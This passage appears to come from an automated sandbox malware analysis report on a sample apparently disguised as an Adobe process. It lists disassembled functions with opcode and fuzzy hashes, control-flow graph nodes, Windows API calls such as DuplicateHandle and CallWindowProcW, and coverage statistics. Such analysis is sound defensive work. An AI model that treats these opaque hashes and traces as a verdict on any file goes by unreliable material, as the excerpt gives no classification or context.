                                                      • Instruction ID: 881563c3450c148ad515628e303385c21d0d04ccc63e93981931428dabbeb271
                                                      • Opcode Fuzzy Hash: f4e7c62041f6546973d09ae3de7b6e675793e462705c8de2967eadc26c7067a9
                                                      • Instruction Fuzzy Hash: 8721E3B59002189FDB10CF99D584AEEBBF5FB08314F14841AE919A3310D378A944CF60
                                                      Function 02D2B018 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 473 2d2b018-2d2b058 474 2d2b060-2d2b08b GetModuleHandleW 473->474 475 2d2b05a-2d2b05d 473->475 476 2d2b094-2d2b0a8 474->476 477 2d2b08d-2d2b093 474->477 475->474 477->476
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02D2B07E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170978120.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2d20000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 711fe85a4c2ec70a8ee281ce753813eff4276adab3995bdc0e7000a34bf81042
                                                      • Instruction ID: f4d23fb3833231ace29a73a662d3d2b99b2bc40c43d875412ce6b84a7a0aac80
                                                      • Opcode Fuzzy Hash: 711fe85a4c2ec70a8ee281ce753813eff4276adab3995bdc0e7000a34bf81042
                                                      • Instruction Fuzzy Hash: DE110FB5C007498FCB20CF9AC544B9EFBF4EF89618F20841AD428A7310D379A649CFA1
                                                      Function 011ED4C4 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170081962.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_11ed000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 36b1b837610679c9a2af41a469d92b80f9e63f03a7a5a6a7e2a593eb936ae6f7
                                                      • Instruction ID: 13c8f095fd00fb3692620360fe061e5bfc35b7cc1b20d4658d03c2afc447af1c
                                                      • Opcode Fuzzy Hash: 36b1b837610679c9a2af41a469d92b80f9e63f03a7a5a6a7e2a593eb936ae6f7
                                                      • Instruction Fuzzy Hash: B121F471500640DFDF09DF98E988B26BFB5FF88318F24C569D9090A256C336D456CAA2
                                                      Function 011FD01C Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170145271.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_11fd000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1cb1da126072aeba5a72d4c126f4ee37d111f13f42077a5bf9dee079c64de23e
                                                      • Instruction ID: 35e931df96a0d5bf5e936e4db6111b84a8e60f6ec28639cb9e1751cc1a5f40f2
                                                      • Opcode Fuzzy Hash: 1cb1da126072aeba5a72d4c126f4ee37d111f13f42077a5bf9dee079c64de23e
                                                      • Instruction Fuzzy Hash: 9E21F271604204DFDF19DF68E984B26BF65FB88354F24C56DEA0A4B356C33AD407CA62
                                                      Function 011FD1D4 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170145271.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_11fd000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5953a02965f1a846d593c1bb78de14b6b122e3f798509e99d3fab3eae17b33f3
                                                      • Instruction ID: c9d22bfe0466717e3c1d8e4d7e49b115b107594aa9dc877e57a82d8575673a5c
                                                      • Opcode Fuzzy Hash: 5953a02965f1a846d593c1bb78de14b6b122e3f798509e99d3fab3eae17b33f3
                                                      • Instruction Fuzzy Hash: 94210775504204DFDF09DF98E5C0F36BB65FB84324F20C56DEA094B256C33AD406CAA2
                                                      Function 011FD006 Relevance: .1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170145271.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_11fd000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7e0d837b520cd5f8785201adc8934826016b4510307e84ed6f07556ee2c14f1f
                                                      • Instruction ID: 40e29b9b89e5aedd89232652b5d11ccb5226473af13e9b7cd77dddbdb286d93f
                                                      • Opcode Fuzzy Hash: 7e0d837b520cd5f8785201adc8934826016b4510307e84ed6f07556ee2c14f1f
                                                      • Instruction Fuzzy Hash: 18219D755093808FDB07CF24D994B15BF71EB46214F28C5EED9498F6A7C33A980ACB62
                                                      Function 011ED4BF Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170081962.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_11ed000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                      • Instruction ID: ff9c18d9b60e16abc3c5872baf4bfeb4a69d98fc4a23fed5485f343ded750e15
                                                      • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                      • Instruction Fuzzy Hash: 8111DF76404280CFCF06CF54E9C4B16BFB1FB88314F24C6A9D9490B256C336D45ACBA2
                                                      Function 011FD1CF Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170145271.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_11fd000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction ID: c19e42b2f5001c6c48e35e3286cc28408dae9853b67370779e0eba6e18757325
                                                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction Fuzzy Hash: 1E11BB79504280DFDB06CF54D5C4B25BFA1FB84224F24C6AED9494B296C33AD40ACBA2
                                                      Function 011ED745 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170081962.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_11ed000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1a62fd515e1b6ef641ec1a5f505b78b59889cad3c53f9caf581e0599fb2f204
                                                      • Instruction ID: 0f6d1119adc5fe3c977d4abec4efaf51aec2b260080d4f27ff57460f65dca0fa
                                                      • Opcode Fuzzy Hash: c1a62fd515e1b6ef641ec1a5f505b78b59889cad3c53f9caf581e0599fb2f204
                                                      • Instruction Fuzzy Hash: 2501FC31444F8099EB144BD9DD88B56FFDCDF45328F18C529ED190A246C3399440C672
                                                      Function 011ED744 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170081962.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_11ed000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f29302701c32063519b827afca7810f30b79f6f974da45f26258491ff04ccb7
                                                      • Instruction ID: f42528c40d4ea2034a8dc128cf07d144148bad5994d1b0ca18287b27b4706bf8
                                                      • Opcode Fuzzy Hash: 7f29302701c32063519b827afca7810f30b79f6f974da45f26258491ff04ccb7
                                                      • Instruction Fuzzy Hash: 70F0F6714047849EEB148F5ADC88B62FFE8EF41734F18C45AED484B286C3799844CBB1

                                                      Execution Graph

                                                      Execution Coverage:9.7%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:42
                                                      Total number of Limit Nodes:4
                                                      execution_graph 28828 b94668 28829 b9467a 28828->28829 28830 b94686 28829->28830 28832 b94779 28829->28832 28833 b9477c 28832->28833 28837 b94888 28833->28837 28841 b94878 28833->28841 28838 b948af 28837->28838 28839 b9498c 28838->28839 28845 b944b0 28838->28845 28839->28839 28842 b9487c 28841->28842 28843 b944b0 CreateActCtxA 28842->28843 28844 b9498c 28842->28844 28843->28844 28846 b95918 CreateActCtxA 28845->28846 28848 b959db 28846->28848 28848->28848 28849 4d74040 28850 4d74082 28849->28850 28852 4d74089 28849->28852 28851 4d740da CallWindowProcW 28850->28851 28850->28852 28851->28852 28814 b9ad30 28818 b9ae28 28814->28818 28823 b9ae18 28814->28823 28815 b9ad3f 28819 b9ae5c 28818->28819 28820 b9ae39 28818->28820 28819->28815 28820->28819 28821 b9b060 GetModuleHandleW 28820->28821 28822 b9b08d 28821->28822 28822->28815 28825 b9ae24 28823->28825 28824 b9ae5c 28824->28815 28825->28824 28826 b9b060 GetModuleHandleW 28825->28826 28827 b9b08d 28826->28827 28827->28815 28853 b9d0c0 28854 b9d106 28853->28854 28858 b9d699 28854->28858 28861 b9d6a8 28854->28861 28855 b9d1f3 28860 b9d6d6 28858->28860 28864 b9d2fc 28858->28864 28860->28855 28862 b9d2fc DuplicateHandle 28861->28862 28863 b9d6d6 28862->28863 28863->28855 28865 b9d710 DuplicateHandle 28864->28865 28866 b9d7a6 28865->28866 28866->28860

                                                      Executed Functions

                                                      Function 00B9AE28 Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 402 b9ae28-b9ae37 403 b9ae39-b9ae46 call b9a14c 402->403 404 b9ae63-b9ae67 402->404 411 b9ae48 403->411 412 b9ae5c 403->412 405 b9ae69-b9ae73 404->405 406 b9ae7b-b9aebc 404->406 405->406 413 b9aec9-b9aed7 406->413 414 b9aebe-b9aec6 406->414 462 b9ae4e call b9b0b0 411->462 463 b9ae4e call b9b0c0 411->463 412->404 416 b9aed9-b9aede 413->416 417 b9aefb-b9aefd 413->417 414->413 415 b9ae54-b9ae56 415->412 418 b9af98-b9afaf 415->418 420 b9aee9 416->420 421 b9aee0-b9aee7 call b9a158 416->421 419 b9af00-b9af07 417->419 435 b9afb1-b9b010 418->435 423 b9af09-b9af11 419->423 424 b9af14-b9af1b 419->424 422 b9aeeb-b9aef9 420->422 421->422 422->419 423->424 426 b9af28-b9af31 call b9a168 424->426 427 b9af1d-b9af25 424->427 433 b9af3e-b9af43 426->433 434 b9af33-b9af3b 426->434 427->426 436 b9af61-b9af6e 433->436 437 b9af45-b9af4c 433->437 434->433 453 b9b012 435->453 443 b9af91-b9af97 436->443 444 b9af70-b9af8e 436->444 437->436 438 b9af4e-b9af5e call b9a178 call b9a188 437->438 438->436 444->443 454 b9b014 453->454 455 b9b016-b9b03e 453->455 454->455 456 b9b040-b9b058 454->456 455->456 457 b9b05a-b9b05d 456->457 458 b9b060-b9b08b GetModuleHandleW 456->458 457->458 459 b9b08d-b9b093 458->459 460 b9b094-b9b0a8 458->460 459->460 462->415 463->415
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00B9B07E
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247990696.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_b90000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 7805a1b9d55c85b1b21ced077f6d7b850c8c856d6697f303b404d90a013dd531
                                                      • Instruction ID: 552136680d73a352774cbfcc789303e22435f46e6c9d2546fd28c173ade2850f
                                                      • Opcode Fuzzy Hash: 7805a1b9d55c85b1b21ced077f6d7b850c8c856d6697f303b404d90a013dd531
                                                      • Instruction Fuzzy Hash: 348179B0A00B058FDB24DF29D05175ABBF1FF89304F10896EE48AD7A51DB75E845CB91
                                                      Function 00B95A84 Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 464 b95a84-b95b14
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247990696.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_b90000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c9844ae18b112587456208aefe43fe51604932a15432f90677d92cc0394a698e
                                                      • Instruction ID: f472f9cacec346a33a7d3fda2ba1f1f99c3579526758e37c83b8e37d9b71709b
                                                      • Opcode Fuzzy Hash: c9844ae18b112587456208aefe43fe51604932a15432f90677d92cc0394a698e
                                                      • Instruction Fuzzy Hash: 00310272844A48CFDF22CFA8C8857EDBBF1EF56314F5082AAC015AB255C735A94ACB11
                                                      Function 00B9590C Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 467 b9590c-b9590e 468 b95910 467->468 469 b95912 467->469 468->469 470 b95914 469->470 471 b95916-b9598c 469->471 470->471 473 b9598f-b959d9 CreateActCtxA 471->473 475 b959db-b959e1 473->475 476 b959e2-b95a3c 473->476 475->476 483 b95a4b-b95a4f 476->483 484 b95a3e-b95a41 476->484 485 b95a51-b95a5d 483->485 486 b95a60 483->486 484->483 485->486 488 b95a61 486->488 488->488
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 00B959C9
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247990696.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_b90000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: ce35d0c8ec9cf157c025b27c85ebe18a4292d296e88b5be279cc1e2b445287d0
                                                      • Instruction ID: cc5122a53a15faf048002e9de9e59d74d82c219a18aa0ff517c20021d10b3df0
                                                      • Opcode Fuzzy Hash: ce35d0c8ec9cf157c025b27c85ebe18a4292d296e88b5be279cc1e2b445287d0
                                                      • Instruction Fuzzy Hash: 044124B0C00719CBDF25DFAAC88478DBBF6BF48314F60806AD008AB251DB756A46CF90
                                                      Function 00B944B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 489 b944b0-b959d9 CreateActCtxA 493 b959db-b959e1 489->493 494 b959e2-b95a3c 489->494 493->494 501 b95a4b-b95a4f 494->501 502 b95a3e-b95a41 494->502 503 b95a51-b95a5d 501->503 504 b95a60 501->504 502->501 503->504 506 b95a61 504->506 506->506
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 00B959C9
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247990696.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_b90000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 5c4b88729f699baae89294dde28f60cc0b4428cb889218e1cbd90f2977e94ae3
                                                      • Instruction ID: 7f20eba6c08e7f6b8c383f8a3836e5732d7fa3bd18e91047f06be7f91f98aaf2
                                                      • Opcode Fuzzy Hash: 5c4b88729f699baae89294dde28f60cc0b4428cb889218e1cbd90f2977e94ae3
                                                      • Instruction Fuzzy Hash: 0041F2B0C0061DCBDB25DFAAC884B9DBBF6FF48304F60806AD408AB255DB756946CF90
                                                      Function 04D74040 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 507 4d74040-4d7407c 508 4d74082-4d74087 507->508 509 4d7412c-4d7414c 507->509 510 4d740da-4d74112 CallWindowProcW 508->510 511 4d74089-4d740c0 508->511 515 4d7414f-4d7415c 509->515 513 4d74114-4d7411a 510->513 514 4d7411b-4d7412a 510->514 517 4d740c2-4d740c8 511->517 518 4d740c9-4d740d8 511->518 513->514 514->515 517->518 518->515
                                                      APIs
                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 04D74101
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2265052588.0000000004D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_4d70000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: CallProcWindow
                                                      • String ID:
                                                      • API String ID: 2714655100-0
                                                      • Opcode ID: ad537b291cd8084843a7e89d51b97f4d498e5c909ed40234f82f706a08d9ecd4
                                                      • Instruction ID: 3e2ee5a8019e0503324af644078ca66e379902a1fa2ef63b5755a45c90e48fd4
                                                      • Opcode Fuzzy Hash: ad537b291cd8084843a7e89d51b97f4d498e5c909ed40234f82f706a08d9ecd4
                                                      • Instruction Fuzzy Hash: 004129B8A00309DFDB15DF99C848AAABBF5FF89314F24C459D519AB321D375A841CFA0
                                                      Function 00B9D2FC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 521 b9d2fc-b9d7a4 DuplicateHandle 523 b9d7ad-b9d7ca 521->523 524 b9d7a6-b9d7ac 521->524 524->523
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B9D6D6,?,?,?,?,?), ref: 00B9D797
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247990696.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_b90000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 8cf1beeb8b487e2b48893dc5950405654146132ce9323bfa6c3b9784b2dd863b
                                                      • Instruction ID: dca0b240ae59e7443a991b855a004e37c6a110a8e83620c0951fd9240db1e32c
                                                      • Opcode Fuzzy Hash: 8cf1beeb8b487e2b48893dc5950405654146132ce9323bfa6c3b9784b2dd863b
                                                      • Instruction Fuzzy Hash: 7821E6B59002489FDB10DF9AD584AEEFBF5FB48310F14846AE918A3310D379A950CFA4
                                                      Function 00B9D709 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 527 b9d709-b9d7a4 DuplicateHandle 528 b9d7ad-b9d7ca 527->528 529 b9d7a6-b9d7ac 527->529 529->528
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B9D6D6,?,?,?,?,?), ref: 00B9D797
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247990696.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_b90000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 1115de71b13da502202dcee55822a195aed75efdbb571e29f9af28199dd2edd2
                                                      • Instruction ID: ee5f0487fb9923da4d539db860b62193b4c23aaf87520c266caa6887b72876d4
                                                      • Opcode Fuzzy Hash: 1115de71b13da502202dcee55822a195aed75efdbb571e29f9af28199dd2edd2
                                                      • Instruction Fuzzy Hash: C221E4B5900249DFDB10CFAAD584AEEBBF5FB48310F14846AE918A3350C378A950CF61
                                                      Function 00B9B018 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 532 b9b018-b9b058 533 b9b05a-b9b05d 532->533 534 b9b060-b9b08b GetModuleHandleW 532->534 533->534 535 b9b08d-b9b093 534->535 536 b9b094-b9b0a8 534->536 535->536
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00B9B07E
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247990696.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_b90000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 36d1e4482115a34b0b198ed50cf28aa7ef1b72793b420f24a02de2ef76d8903f
                                                      • Instruction ID: d2da16e4901bbe1155d0fb1b89a52a821ae28d3d7ed7c9d8a6f4f6de6cd01098
                                                      • Opcode Fuzzy Hash: 36d1e4482115a34b0b198ed50cf28aa7ef1b72793b420f24a02de2ef76d8903f
                                                      • Instruction Fuzzy Hash: 39110FB6C002498FCB20DF9AD544B9EFBF4EB88710F10846AD529A7210D379A545CFA1
                                                      Function 00AAD01C Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247557884.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_aad000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3424f12d19fc40c7d32932c5f9012dcd95a321ac8944980d7f422ff85f088816
                                                      • Instruction ID: 1d9eef0012adc1450b7abbb1268a468de0520ea04f2c8f5bdc99c7993d6fd7a2
                                                      • Opcode Fuzzy Hash: 3424f12d19fc40c7d32932c5f9012dcd95a321ac8944980d7f422ff85f088816
                                                      • Instruction Fuzzy Hash: 8021F271604204DFCB15DF24D984B26BF65FB89314F20C569D98B4B696C33AD807CA61
                                                      Function 00AAD1D4 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247557884.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_aad000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fe1f8be56073fd5dccadc226c57e572519468f538364503cd379f7476da89b80
                                                      • Instruction ID: 63a66e861682ee5c28ddeef07efe500e4bb223f7b68e68582a6ce6e8b5868ee2
                                                      • Opcode Fuzzy Hash: fe1f8be56073fd5dccadc226c57e572519468f538364503cd379f7476da89b80
                                                      • Instruction Fuzzy Hash: 41210771504204EFDB05DF14D5C0F66BB65FB85314F20C56DD98A4B696C33AD80ACA61
                                                      Function 00AAD1CF Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247557884.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_aad000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction ID: 1669ae03e294c9a0102772b60490cfe9bf4ff772a1642416628f777289fa06d2
                                                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction Fuzzy Hash: 8511BB75504280DFCB02CF10C5C4B15BBA1FB85314F24C6A9D88A4B6A6C33AD80ACB62
                                                      Function 00AAD017 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247557884.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_aad000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction ID: 8cdc3029a8251a129a43715088ee3c32600d6828d7247cdf3a00183ee10013ae
                                                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction Fuzzy Hash: 82119075504280DFDB16CF14D5C4B15FF71FB49314F24C6AAD88A4B696C33AD84ACB62
                                                      Function 00A9D745 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247467558.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a9d000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ff2a25dbe43fbbf736415a301e0ae0a1b3239b556d9d301b845e378b960ae020
                                                      • Instruction ID: 4548156011a6797d0702fc8a08665dac64fcdaf6eb0c876c74105d68e4acaff5
                                                      • Opcode Fuzzy Hash: ff2a25dbe43fbbf736415a301e0ae0a1b3239b556d9d301b845e378b960ae020
                                                      • Instruction Fuzzy Hash: AF01DB712053449AEB209F95CD84B67BFECEF55324F18C52AED091F286D2799881CAB1
                                                      Function 00A9D744 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247467558.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a9d000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d64fc1af84ae6df5aaf9fa5236e96af5f1e3ef189464e6457b5334ee1530b74
                                                      • Instruction ID: bdae1bb88779d7f462bd5a905678d9c747135cb8e0f1b44294f3c89d6d75b576
                                                      • Opcode Fuzzy Hash: 6d64fc1af84ae6df5aaf9fa5236e96af5f1e3ef189464e6457b5334ee1530b74
                                                      • Instruction Fuzzy Hash: E7F062715053449AEB108F56C888B66FFE8EF95734F18C45AED485F286C2799884CBB1

                                                      Execution Graph

                                                      Execution Coverage:8.7%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:33
                                                      Total number of Limit Nodes:5
